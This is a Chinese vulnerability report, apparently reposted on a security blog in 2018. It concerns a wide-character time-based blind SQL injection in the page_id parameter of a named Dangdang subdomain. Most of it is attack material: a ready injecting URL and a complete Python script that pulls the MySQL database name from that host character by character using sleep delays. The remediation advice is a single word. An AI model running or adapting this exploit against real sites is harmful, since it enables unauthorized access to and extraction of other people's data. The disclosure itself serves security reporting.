>当当网某子域名存在时间盲注 | 安全盒子 | xxx>当当网某子域名存在时间盲注 | 安全盒子 – xxx
菜单






>当当网某子域名存在时间盲注 | 安全盒子

七月 21, 2018 - 安全盒子

简要描述:

当当网某子域名存在宽字符时间盲注

详细说明:

http://e.dangdang.com/Standard/Framework/Core/hosts/ajax_api.php?isajax=1&page_id=14456%df’or/**/sleep(5)%23&component_map_id=74288&domain=shuzi.dangdang.com&path_name=index&areaid=0&page_type=3&areatype=0&static_type=0&mix=1&domain_flag=1

page_id 参数 存在宽字符时间盲注

附测试脚本

 

code 区域

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<span class=“com”>#encoding=utf-8</span>
<span class=“kwd”>import</span><span class=“pln”> httplib</span>
<span class=“kwd”>import</span><span class=“pln”> time</span>
<span class=“kwd”>import</span> <span class=“kwd”>string</span>
<span class=“kwd”>import</span><span class=“pln”> sys</span>
<span class=“kwd”>import</span><span class=“pln”> random</span>
<span class=“pln”>
headers </span><span class=“pun”>=</span> <span class=“pun”>{}</span>
<span class=“pln”>
payloads </span><span class=“pun”>=</span> <span class=“str”>‘abcdefghijklmnopqrstuvwxyz0123456789@_.’</span>
<span class=“kwd”>print</span> <span class=“str”>‘Start to retrive mysql database():’</span>
<span class=“pln”>
user </span><span class=“pun”>=</span> <span class=“str”></span>
<span class=“kwd”>for</span><span class=“pln”> i </span><span class=“kwd”>in</span><span class=“pln”> range</span><span class=“pun”>(</span><span class=“lit”>1</span><span class=“pun”>,</span> <span class=“lit”>30</span><span class=“pun”>):</span>
<span class=“pln”>
    j </span><span class=“pun”>=</span> <span class=“lit”>0</span>
<span class=“pln”>
    isbreak </span><span class=“pun”>=</span> <span class=“kwd”>False</span>
    <span class=“kwd”>for</span><span class=“pln”> payload </span><span class=“kwd”>in</span><span class=“pln”> payloads</span><span class=“pun”>:</span>
        <span class=“kwd”>try</span><span class=“pun”>:</span>
<span class=“pln”>
            s </span><span class=“pun”>=</span> <span class=“str”>“ascii(substring(lower(database()),%s,1))=%s”</span> <span class=“pun”>%</span> <span class=“pun”>(</span><span class=“pln”>i</span><span class=“pun”>,</span><span class=“pln”> ord</span><span class=“pun”>(</span><span class=“pln”>payload</span><span class=“pun”>))</span>
<span class=“pln”>
            s </span><span class=“pun”>=</span> <span class=“str”>“if((“</span> <span class=“pun”>+</span><span class=“pln”> s </span><span class=“pun”>+</span> <span class=“str”>“),sleep(5),1)”</span>
<span class=“pln”>
            conn </span><span class=“pun”>=</span><span class=“pln”> httplib</span><span class=“pun”>.</span><span class=“typ”>HTTPConnection</span><span class=“pun”>(</span><span class=“str”>‘e.dangdang.com’</span><span class=“pun”>,</span><span class=“pln”> timeout</span><span class=“pun”>=</span><span class=“lit”>5</span><span class=“pun”>)</span>
<span class=“pln”>
            conn</span><span class=“pun”>.</span><span class=“pln”>request</span><span class=“pun”>(</span><span class=“pln”>method</span><span class=“pun”>=</span><span class=“str”>‘GET’</span><span class=“pun”>,</span>
<span class=“pln”>
                         url</span><span class=“pun”>=</span><span class=“str”>“/Standard/Framework/Core/hosts/ajax_api.php?isajax=1&amp;page_id=14456%df’or/**/”</span> <span class=“pun”>+</span><span class=“pln”> s </span><span class=“pun”>+</span><span class=“str”>“%23&amp;component_map_id=74288&amp;domain=shuzi.dangdang.com&amp;path_name=index&amp;areaid=0&amp;page_type=3&amp;areatype=0&amp;static_type=0&amp;mix=1&amp;domain_flag=1”</span><span class=“pun”>,</span>
<span class=“pln”>
                         headers</span><span class=“pun”>=</span><span class=“pln”>headers</span><span class=“pun”>)</span>
<span class=“pln”>
            start_time </span><span class=“pun”>=</span><span class=“pln”> time</span><span class=“pun”>.</span><span class=“pln”>time</span><span class=“pun”>()</span>
<span class=“pln”>
            conn</span><span class=“pun”>.</span><span class=“pln”>getresponse</span><span class=“pun”>()</span>
<span class=“pln”>
            conn</span><span class=“pun”>.</span><span class=“pln”>close</span><span class=“pun”>()</span>
            <span class=“kwd”>print</span> <span class=“str”>‘.’</span><span class=“pun”>,</span>
<span class=“pln”>
            j </span><span class=“pun”>=</span><span class=“pln”> j </span><span class=“pun”>+</span> <span class=“lit”>1</span>
            <span class=“kwd”>if</span><span class=“pln”> j </span><span class=“pun”>==</span><span class=“pln”> len</span><span class=“pun”>(</span><span class=“pln”>payloads</span><span class=“pun”>):</span>
<span class=“pln”>
               isbreak </span><span class=“pun”>=</span> <span class=“kwd”>True</span>
        <span class=“kwd”>except</span><span class=“pun”>:</span>
<span class=“pln”>
            user </span><span class=“pun”>+=</span><span class=“pln”> payload</span>
            <span class=“kwd”>print</span> <span class=“str”>‘[in progress]’</span><span class=“pun”>,</span><span class=“pln”> user</span>
            <span class=“kwd”>break</span>
    <span class=“kwd”>if</span><span class=“pln”> isbreak</span><span class=“pun”>:</span>
       <span class=“kwd”>break</span>
<span class=“kwd”>print</span> <span class=“str”>‘[Done] mysql database is %s’</span> <span class=“pun”>%</span><span class=“pln”> user</span>

漏洞证明:>当当网某子域名存在时间盲注 | 安全盒子

 

修复方案:

过滤








Notice: Undefined variable: canUpdate in /var/www/html/wordpress/wp-content/plugins/wp-autopost-pro/wp-autopost-function.php on line 51